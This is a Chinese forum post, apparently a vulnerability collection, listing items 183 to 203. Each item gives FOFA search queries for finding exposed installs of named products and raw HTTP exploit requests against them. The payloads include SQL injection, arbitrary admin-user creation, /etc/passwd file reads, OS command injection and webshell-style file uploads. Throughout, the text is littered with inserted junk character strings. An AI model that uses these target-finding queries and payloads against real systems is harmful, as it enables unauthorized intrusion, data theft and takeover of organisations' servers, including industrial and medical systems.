# x7 B8 r/ V- M' Z183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入$ @. B& ~+ i  y) g
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
1 k0 J/ U- n9 t6 Z+ B  R7 mGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1. e9 R3 D0 p9 ?0 p: K+ ]. ^
Host: your-ip, x9 G( I6 f. g, C
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36* ~+ a) s* f' l. ^  f2 K5 L
Accept-Charset: utf-8
7 u; t4 }' V$ s9 I$ D$ vAccept-Encoding: gzip, deflate
: C1 }/ t* z6 a- RConnection: close2 p/ {: {+ |" V* @

; |/ w+ y0 a% ~% A
1 g2 w2 L# u! z  L184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
9 t3 Y, W+ e% S5 t7 f( u0 V5 C0 yFOFA:server="SunFull-Webs"
1 t* z* O9 |( X" G6 ?' GPOST /soap/AddUser HTTP/1.1
6 g$ n- G9 n+ A% a* N8 AHost: your-ip
- V, R+ Q0 I4 d; g# q+ [, b1 ^+ ]0 Y. mAccept-Encoding: gzip, deflate
- J" I* f$ u6 _& |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0! ]; g5 F2 k4 T, c- x4 z
Accept: application/xml, text/xml, */*; q=0.01$ y+ [8 Z4 e! |7 R8 L$ L% `& P8 W* |6 c
Content-Type: text/xml; charset=utf-8
" P2 P. t; r% o( P' c0 z. _  }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, [& F/ v$ H+ R- T
X-Requested-With: XMLHttpRequest* O6 w& B3 c( e2 o3 {- A1 y5 q

5 [8 q! ]& y8 Y' e1 T# K) @0 W& x! E: s' w9 h4 e; _
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56'). [) d: j/ G* D5 s! C+ i

$ B3 g+ D8 k4 H9 U- H4 o1 z: l+ m5 ^: F9 `; _7 X- h+ F& j& I
185. 瑞友天翼应用虚拟化系统SQL注入3 f: ^  D: Q& c# I
version < 7.0.5.1
* p; A" m$ F" j) qFOFA:app="REALOR-天翼应用虚拟化系统"
% h0 P3 J3 x4 {1 t& p0 o: JGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1( B/ x( d7 s. B, A
Host: host0 e) r: @. g$ \; l

# J0 ?* X% c4 d5 T7 a+ H# q: k; {; Q6 i- ]
186. F-logic DataCube3 SQL注入
, e) R# c! s. ]' b- o7 p2 lCVE-2024-317505 Z7 D$ H4 G! t, X' }# g9 l" }
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统, Z- D: R9 J2 w
FOFA:title=="DataCube3"  Q, A& n! i$ _$ E2 f
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
* A5 k% Q/ L9 Y* vHost: your-ip! Q* s8 _" L+ l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
3 _3 E% O& K- u5 q" o- bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8/ g9 B& [& w$ ^; X- b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' i' [+ V4 ]0 w# t0 ~: z: Z6 N1 TAccept-Encoding: gzip, deflate: b: S+ P/ @0 Q2 P8 x
Connection: close
, I" m; L2 `" c( v7 ^5 cContent-Type: application/x-www-form-urlencoded6 l* B0 s  t/ k8 t2 b; O
: [3 t/ \( B0 L8 E& A
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
* ~( W1 v4 q5 u6 c9 m9 l3 y' K; ?- u/ c# Y9 D$ I/ S
, W& }( r  v/ e3 ]
187. Mura CMS processAsyncObject SQL注入3 D! S4 ]( s+ N4 J- V
CVE-2024-326407 K8 F& {/ Y) v* T& T
FOFA:"Mura CMS"
$ D( F& f4 l3 @7 i" \- ]1 OPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
' T" c1 |% `9 vHost: your-ip% L+ }( [$ ]3 y* u8 k' I
Content-Type: application/x-www-form-urlencoded! z; ?: H- m9 s/ [: W2 a/ L

; F8 Z8 h4 u/ v/ W0 N; n4 U, }2 ^8 g3 P! ?, n3 D9 E
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1' R8 g* ]  ~" ]0 i' U* g& S9 {

6 J0 _. K" l7 w% G4 _$ C" a
1 u' B- w3 G5 t6 D4 g* ^- j188. 叁体-佳会视频会议 attachment 任意文件读取) H+ {9 a- |, |5 @0 }
version <= 3.9.7; x9 Q& O& c; P* k  [1 x  `& p
FOFA:body="/system/get_rtc_user_defined_info?site_id"
8 G7 Q1 X9 E  ?4 d4 n3 x0 _" M, ~) wGET /attachment?file=/etc/passwd HTTP/1.1
7 r0 X( K& {' N5 z6 l, B# dHost: your-ip9 v- w8 u% V, P' T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
' E4 |/ C- q( [8 i% ]3 D& S! O0 m/ WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" X  F9 U: I8 A5 r0 U% AAccept-Encoding: gzip, deflate9 A) k3 a4 G) h! q; h
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8. Z0 F' W/ y3 }2 F/ H: H( {
Connection: close
+ ^: y+ M" i) \6 T# M7 E: I# n& n* e7 p( ?4 ~* Y5 U" R# Q) m

" F: s% s- s, C6 n189. 蓝网科技临床浏览系统 deleteStudy SQL注入
9 y1 ]# C, [. C; g. JFOFA:app="LANWON-临床浏览系统"  ~; G1 J* k: \2 ]( s6 v6 H7 J$ ~
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
0 x# h+ W1 x& t/ _0 }+ Q9 W* P, SHost: your-ip- i0 p$ J; y0 o* @( i9 T; H7 h
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36$ }/ X) T# {+ o2 w$ K- \3 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 d6 o( F- I1 P/ Z0 @8 T
Accept-Encoding: gzip, deflate
6 r& d' @& a. x: U# F4 ~Accept-Language: zh-CN,zh;q=0.9
$ t8 U7 n5 |! RConnection: close
- v6 f* c+ Q, }9 w# t4 j9 l& [$ v5 z; h2 Q9 {0 G8 X: a

: g. F: S9 W7 J: n190. 短视频矩阵营销系统 poihuoqu 任意文件读取
' S' k0 S2 \, N$ k/ h) GFOFA:title=="短视频矩阵营销系统"
2 a7 h/ J5 q9 l0 c7 SPOST /index.php/admin/Userinfo/poihuoqu HTTP/29 G$ \* N, D5 R
Host: your-ip
( j3 C- E# c+ O4 a1 i: p" C$ hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
5 K8 b" t. h+ Q1 s0 G5 N! A% BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
1 z2 Y  W; O- ?Content-Type: application/x-www-form-urlencoded
$ a4 a5 S" {0 d6 K% @$ HAccept-Encoding: gzip, deflate
; w8 u2 l" c- }! P2 F  eAccept-Language: zh-CN,zh;q=0.9) U7 M8 y% W7 K" `5 J' k

1 ]- H! M# p1 C) n) X3 g0 }9 Opoi=file:///etc/passwd5 S0 D6 \/ I/ V/ ?
& I4 x0 `, A: t5 K, j" m# v
, F5 O. h" g" e$ [, N
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
! }- d- A0 k3 U; L4 @, D  y' ?" ~FOFA:body="/CDGServer3/index.jsp"
( j. `8 _; C6 lPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
. Q* ~" q$ _; u8 X+ @Host: your-ip+ Y" ~+ R3 j1 B3 f- K7 D- B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 B) Q8 R) h: Y+ YContent-Type: application/x-www-form-urlencoded
) `* T( P6 q# F; c( X# e
; {- H6 Z. y8 W6 m6 Fcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
# I4 q1 O+ [  s9 m1 Y6 J
4 K  J7 ]$ g6 x8 H. ~; `% R' z
6 C3 L3 x4 `3 H192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
( m" S4 e; B! O/ s2 \# u8 hFOFA:title="用户登录_富通天下外贸ERP"7 u0 x7 }! a4 b7 X8 j
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
1 l, o# ?* r( M, G2 E0 Q# JHost: your-ip+ L, h0 `- C  P2 e6 L; p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
$ L' }2 t0 l5 F6 [. |# r. GContent-Type: application/x-www-form-urlencoded/ i+ X- `, L; g7 i! K
( ?) e# o% Y" T( [% ~

1 P8 f9 x: w. d  S; i- N<% @ webhandler language="C#" class="AverageHandler" %>
6 M' I: I/ c% E2 d( c8 zusing System;
+ M% L3 P. y* K$ p4 W; w, Ousing System.Web;
4 R! w8 l% l! K+ I- Z. Hpublic class AverageHandler : IHttpHandler4 U( K+ p/ z7 k  e" |6 P3 A/ Y
{
$ J  g: S9 B, Q- y! Y; Qpublic bool IsReusable
9 I/ W1 j, c1 B{ get { return true; } }
/ b3 E3 M; h# P' u* i9 W' U: D8 zpublic void ProcessRequest(HttpContext ctx)5 D0 K; F: z3 t$ I- i, \
{, H& L( J$ M1 E0 g3 p7 h/ ^
ctx.Response.Write("test");
' @) R" _  A1 x}
1 s5 o5 M# c" Q/ Z: l* Z5 p' G+ C}. {8 Z2 S- T* B5 D+ F$ [; S$ y) I
6 X8 ~- ]5 J( {: R) x4 s
( d7 `5 _% y1 a2 _- f$ X: x
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
0 Z9 m# O( m9 u$ K% @+ [FOFA:body="山石云鉴主机安全管理系统"1 D% q0 _1 d& X$ `" ^
GET /master/ajaxActions/getTokenAction.php HTTP/1.1" I) B/ d& k8 L, Q7 B3 i
Host:: |3 a$ C& N4 V
Cookie: PHPSESSID=2333333333333;) ^$ C, s+ [+ F5 s- L' ?9 _
Content-Type: application/x-www-form-urlencoded
+ T3 z% V: _: r; C: j- V) o# M& FUser-Agent: Mozilla/5.0' R( H6 V! o1 T

; t7 I* h3 k4 n) b8 H1 e# [) s$ p* v8 T+ R' o. P3 P3 n
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.17 V: j; e" Z; P' K6 G* ?! A  H
Host:* u9 n7 g" s) G7 s$ S8 J* y& }! F+ O
User-Agent: Mozilla/5.0( J$ _, M6 B5 i! t
Accept-Encoding: gzip, deflate
+ R$ e7 ?- t$ T. K; NAccept: */*) b( y& @) O8 w( w& v; D( ^
Connection: close) Z( Y# V+ Y! d
Cookie: PHPSESSID=2333333333333;
+ `# ]1 V8 B( y; M  }2 l/ n" LContent-Type: application/x-www-form-urlencoded3 d. X' K8 |. Y3 r, \5 B- m
Content-Length: 84! w1 r& I4 z5 D0 k8 q3 m$ R) X, n" `4 h

3 E% H5 ?9 Z9 F+ V8 gparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')0 p( K& x) V) N  q) e% h
! `6 \. }2 ]7 p8 c
# E, W8 X3 Y! P& v5 M" I6 K
GET /master/img/config HTTP/1.1
0 b7 ^. x8 t3 MHost:* T' |% Q9 V# P; S+ k6 G/ c
User-Agent: Mozilla/5.0
( J' N" f0 n$ D$ c; b
9 O+ m+ g1 g7 T; F6 h$ a
' o+ x7 G: o& U: ?( u4 J. Q7 Y194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传3 o* q2 D/ v0 }5 M/ `, w3 G% y
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
% ~, c, s; _) H8 ]8 F- h
# k2 x2 \/ W; s0 WPOST /servlet/uploadAttachmentServlet HTTP/1.1! H' M. `4 ]  S
Host: host
8 |# X1 V( B+ y' i2 U# u$ |* iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
7 q6 z/ {! }7 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 H% E) b) P6 c/ g1 k) c# Q9 D, EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! k- B' I' G& c/ |
Accept-Encoding: gzip, deflate- n5 u% @( w2 P, D4 V
Connection: close# O4 F( X. a1 ^4 J$ r8 ?  }- Z) C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
/ R7 ?# v9 R* q1 |  j, H------WebKitFormBoundaryKNt0t4vBe8cX9rZk1 M6 v: d0 n/ l5 I" Z5 ]7 }8 q9 w- w

; \! T" c' i4 a6 d) {9 U3 [9 qContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
) L0 o& |5 }; l* v; M# }+ V  cContent-Type: text/plain2 {8 P, b% C$ U$ _, H4 E% w
<% out.println("hello");%># G8 j% `- Y3 r
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
3 I! G+ j% {3 ?7 qContent-Disposition: form-data; name="json"& v3 [) u, G- M! \3 E& n1 S0 y, o8 n
{"iq":{"query":{"UpdateType":"mail"}}}$ z( ^5 n2 @" x2 z9 E5 f% B
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--, X. E* i/ d8 F3 i
. V: i+ h6 N% L; Q) v) ~% N9 Y

- E) D" `# r/ i* Q7 T& g- h195. 飞鱼星上网行为管理系统 send_order.cgi命令执行8 Y* N( {7 O# U+ {" D8 K3 c
FOFA:title=="飞鱼星企业级智能上网行为管理系统- X6 `/ |& h6 O/ x, E( s
POST /send_order.cgi?parameter=operation HTTP/1.12 a/ u- r$ q! y/ L! B, l0 E8 b
Host: 127.0.0.13 |; O& K6 n; I( b
Pragma: no-cache. e4 z. W9 D4 Z* a
Cache-Control: no-cache! z0 N/ I0 _' s' h6 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36' k/ H* X& z0 z6 x( X
Accept: */*
3 @* }$ [9 M- m; P( sAccept-Encoding: gzip, deflate
* K" ~+ O/ u5 aAccept-Language: zh-CN,zh;q=0.95 ?4 P/ u$ q. w+ Y. U) J/ P& o
Connection: close4 G/ n2 {/ v  h: p0 L0 F
Content-Type: application/x-www-form-urlencoded
: J+ ]/ a* e; n1 DContent-Length: 68
; G' Q: }% u9 Z4 G# `, u' m  i# `4 h: L# }( J6 d' e
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
* `/ Z% p7 J/ s! h% v6 I7 ~9 u
* q1 W- T+ i' d! k' n3 v# m
: ~5 K' S% z0 i, z3 [196. 河南省风速科技统一认证平台密码重置
0 a, G5 a; S$ {  FFOFA:body="/cas/themes/zbvc/js/jquery.min.js"* g: A6 [9 Q0 V* v  U8 {
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1) J6 v/ G" B. h8 a/ U! }) }' C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
& \0 E0 O1 f! t& UContent-Type: application/json;charset=UTF-8
* V0 U2 C" M/ ^  CX-Requested-With: XMLHttpRequest7 P* t: d8 D8 t! T' p, r3 c
Host:: F: ^' `; d4 s( S: p$ u
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+ L% `7 R* X4 U' {4 o% zContent-Length: 45/ ?$ V* j* d' N% n- o! p5 u
Connection: close
8 q! i5 W3 f+ X& S1 c. V
" N) x* J- H$ t$ L# e& u{"xgh":"test","newPass":"test666","email":""}  D- h- M1 X! y1 a# G
* w) g4 f' ~- t# D+ o6 w2 A0 c

5 u7 @1 r0 @6 m$ S
# P& ~9 u3 F/ t4 E5 W& O7 }9 j197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
  H& k& Y2 Y; N; Y! xFOFA:app="浙大恩特客户资源管理系统"9 B( ?1 t* Z; U9 X' E1 y
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1- d( m% Y8 n$ }/ V
Host:. ~* U, Y* e3 I  w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
) j$ A( I5 j: t$ }" E0 CAccept-Encoding: gzip, deflate, Y; Q  A! h0 f
Connection: close
! T, l* N" ~) g6 I7 }  C4 A2 j" ]. \- Y7 O

; n6 \8 x# y6 Z7 \8 a( m
9 _3 e) b9 y9 x3 V! G9 D9 h; H& I198.  阿里云盘 WebDAV 命令注入+ M2 e1 s! k  n  `3 B
CVE-2024-29640) s/ l  E* o) F
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1/ t' D6 |  M5 j9 P
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
; }2 l+ v' }! _$ f$ ?Accept: */*
8 z8 D8 R( F' n) Q# t8 E7 gAccept-Encoding: gzip, deflate
6 `% d- Q5 F8 h5 e6 T) D. IAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
) C" h. Z6 L- L/ P7 b. K9 ^# K' |Connection: close
7 D; m- m! y$ h& T1 R  Y5 U
& b" x( Z' N) @* e! q% X3 H; |, v
199. cockpit系统assetsmanager_upload接口 文件上传& T) S' t8 x1 v% [/ o' C2 K
- t1 [# J0 F- B$ ]# @( Q
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:+ R, V) n' ]/ r& Z5 u3 T8 [. C
GET /auth/login?to=/ HTTP/1.1
2 t* e& ~1 [, k3 r4 [6 k$ L) ]# P# u/ G7 W  {* h8 e
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"( x1 H; q' Q% t- t# q
  _. V" C% a. f) V
2.使用刚才上一步获取到的jwt获取cookie:/ O3 P9 r' e# x0 \3 G8 i! v. v1 {

1 }! o9 X! Q5 r3 v. j6 ZPOST /auth/check HTTP/1.1
$ X( e9 V7 v$ B2 o- [; t% }: x7 Q2 AContent-Type: application/json+ d  a- b+ l0 F. R+ ^% r

1 H* c7 q$ \: N9 V% J& J3 E{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}* a  |, a: p9 r8 K1 L6 n

1 X- J2 U. T, ~" m/ T5 f响应:200,返回值:) K* M: t) \! {  V. G
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/8 k6 Y3 T% o$ w1 ^9 x' a  J
Fofa:title="Authenticate Please!"
/ W' z9 H, G- \3 c/ RPOST /assetsmanager/upload HTTP/1.1
9 c; W' j2 g* z  i3 FContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
/ L# y9 n" z3 b+ k+ eCookie: mysession=95524f01e238bf51bb60d77ede3bea926 T* h: h" ?, H
/ f5 a# A: X% i+ l8 F8 s% V
-----------------------------36D28FBc36bd6feE7Fb3) `% Q4 J/ l; C" ?- `* U
Content-Disposition: form-data; name="files[]"; filename="tttt.php"$ L6 P9 i5 f7 [4 h" ^/ i2 N
Content-Type: text/php
* z. k* i$ k7 u  ]% L1 h5 v4 z6 Q) v) {1 K" j7 z6 Z1 L, f- [/ l
<?php echo "tttt";unlink(__FILE__);?>
7 j5 k' e5 W, O$ a$ B5 p-----------------------------36D28FBc36bd6feE7Fb3
+ o8 k& J; G/ e& DContent-Disposition: form-data; name="folder"8 [# p5 P# X  z& m

( G+ `/ O$ G" q# }: c-----------------------------36D28FBc36bd6feE7Fb3--2 N. t- J# n* Q, s/ n

! `3 X/ {, x$ H
$ h! F! y* q# {( O/storage/uploads/tttt.php
3 a6 n8 Y% n* s6 B
5 N0 ~2 k* O+ c* Q200. SeaCMS海洋影视管理系统dmku SQL注入
# Y( G7 u4 u  K, J8 sFOFA:app="海洋CMS"
. d& h: D8 v) n3 nGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
! b' d+ a2 \- V) [) {, QCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s! a- H& m3 w: B+ W! h5 K( L; H9 y
Upgrade-Insecure-Requests: 1
1 c5 o; d7 @* B5 ^+ N. S8 n" ACache-Control: max-age=0' K, }+ }& E2 @, p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 W# }  @' B+ V* u" ?# S
Accept-Encoding: gzip, deflate
' K1 t+ [7 `; Q9 ~9 D1 EAccept-Language: zh-CN,zh;q=0.9
1 z* ^( O4 X! Y4 D
; {8 U, Y0 P3 K/ V8 F) X# T% S# ]" D) D( c
201. 方正全媒体新闻采编系统 binary SQL注入' W" M0 v& e5 Z+ P! x6 G' l) Q
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
7 }/ R& G8 E  d! XPOST /newsedit/newsplan/task/binary.do HTTP/1.11 U6 a% Q  _4 j
Content-Type: application/x-www-form-urlencoded
7 H/ `0 ]" r. }, R% f! {2 B# xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. T. F" Z' I& k6 ]$ o# E" Q; ]
Accept-Encoding: gzip, deflate
! i2 o) B, x  ]0 }$ XAccept-Language: zh-CN,zh;q=0.9
! z% @- p$ X# H* N6 P1 XConnection: close
7 z7 E' U' D2 _( x' J7 G- B. z/ W* c' ?
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
0 P% d! F$ s' \% R/ j6 r. r  W' x& O+ }0 f3 S/ M
% F2 {, {. [! A
202. 微擎系统 AccountEdit任意文件上传
' r0 d5 s! c1 Y) u" KFOFA:body="/Widgets/WidgetCollection/"  ~0 ?- Q% M7 y6 a* Q
获取__VIEWSTATE和__EVENTVALIDATION值
' S: E! R, V/ v, _GET /User/AccountEdit.aspx HTTP/1.1+ z' [' Q5 B0 ?7 a0 v4 j# J
Host: 滑板人之家
  I) ?8 C0 E' w4 k/ U& ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31" u- _6 k* R; B! y
Content-Length: 0
, I( t: m; c# ~# Q+ \$ q0 R2 D4 c6 h# G7 t) \. v+ Y/ m

0 v" c# R" @8 O- @替换__VIEWSTATE和__EVENTVALIDATION值
' N* n. l# Q( P& R8 ?7 N  CPOST /User/AccountEdit.aspx HTTP/1.1# U3 m& b. B% q9 `4 r1 Y3 C. O: S
Accept-Encoding: gzip, deflate, br+ z5 ^" P: }& B( a$ ]( u7 v9 V
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
: M/ W# ^" h% Y% v* B
9 R- O0 d9 K7 e-----------------------------786435874t38587593865736587346567358735687
8 j) v% j- p% Q( ~7 ~: {Content-Disposition: form-data; name="__VIEWSTATE"
8 c4 Q4 `: A  q7 f- e+ f" n) y& g1 t
__VIEWSTATE2 [- @. O  |9 }/ r3 N" D
-----------------------------786435874t38587593865736587346567358735687
4 O' Z; S' ?& j' r# [( [Content-Disposition: form-data; name="__EVENTVALIDATION"
/ v: i/ }& \1 @4 }7 ]
6 b. u+ B; b' k$ e/ D# ]0 s9 r! W__EVENTVALIDATION
2 k1 l9 {. ?: q* O. Q: R, b' w-----------------------------786435874t38587593865736587346567358735687
- V9 x/ T2 i( e7 O7 k. j1 I2 BContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt". W1 C: @: n$ Y% p/ y
Content-Type: text/plain& x" s* N3 n( u% M1 k; i
) d1 k$ q/ s3 v$ m8 F
Hello World!2 w% p6 E- m9 v, X5 D. m3 M
-----------------------------786435874t38587593865736587346567358735687. J* @( ~8 V, h* Q: `
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"% O' E* ~$ z- C

$ R) l3 }' V0 ?% x# ]* F6 p% e  Y上传图片" N% N$ g; @/ N$ U2 e  H- ]
-----------------------------786435874t38587593865736587346567358735687
' v* Y0 O* n  f8 v, i$ x* jContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
3 E+ M4 J  N" v7 g! F0 d) c! p% W9 F" Q0 l1 K, n0 N
! W# H: l6 Z$ l3 X  X
-----------------------------786435874t385875938657365873465673587356878 a, l- T4 M9 H' S' _. ^
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
/ B: y  |; f: [" j
) o( S- C. b: Y# K- ^- C! I
1 U: e- e  b/ @9 h" y% |0 s-----------------------------786435874t38587593865736587346567358735687--
( Z% _8 c3 b8 u8 \  D
1 Y. T7 }. @7 T( \0 J1 v
9 k$ f  u5 t& W7 x" m/_data/Uploads/1123.txt
- r" y  R$ H  q
  H( }9 k. `9 h203. 红海云EHR PtFjk 文件上传! J% I2 ~+ z/ P: u
FOFA:body="RedseaPlatform"
* X/ s" q+ A2 B) {3 t3 SPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
5 ~( U1 z$ f1 W6 n5 B+ ~Host: x.x.x.x5 ~7 e4 a3 m5 W
Accept-Encoding: gzip
4 X9 _% a- d: p# _! U! f5 R! JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 L) \9 H8 V4 c7 y" K2 oContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys40 J, `, ~( M1 ~# P; q- `8 x
Content-Length: 2101 I- D7 o8 }9 M0 N/ e6 i: O  N& l
' a0 n) w- [0 x+ y5 K- N. j* d+ |
------WebKitFormBoundaryt7WbDl1tXogoZys4
5 C: t- d& k$ a5 Y+ ^Content-Disposition: form-data; name="fj_file"; filename="11.jsp"! Y/ O5 y$ ]. k5 x
Content-Type:image/jpeg# g8 [+ k: O3 {) ]% u. P6 O* t
+ `+ c" `" c4 i. n
<% out.print("hello,eHR");%>: ^3 t- R* e; J% f) y4 }+ x- L5 O
------WebKitFormBoundaryt7WbDl1tXogoZys4--! m, {7 e/ V2 i/ y

! c+ F3 A6 a2 ^5 r5 S4 V4 e ! g1 {: v5 U% A3 l. c9 U2 H

4 I  Z: V4 x/ z+ R1 H$ D0 S' _* y3 U. n, u% V) g  y$ l
- x& D5 k) j7 Y0 Z9 d  R" `0 x- K3 j

: l1 g& T; u1 `1 b) z$ @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表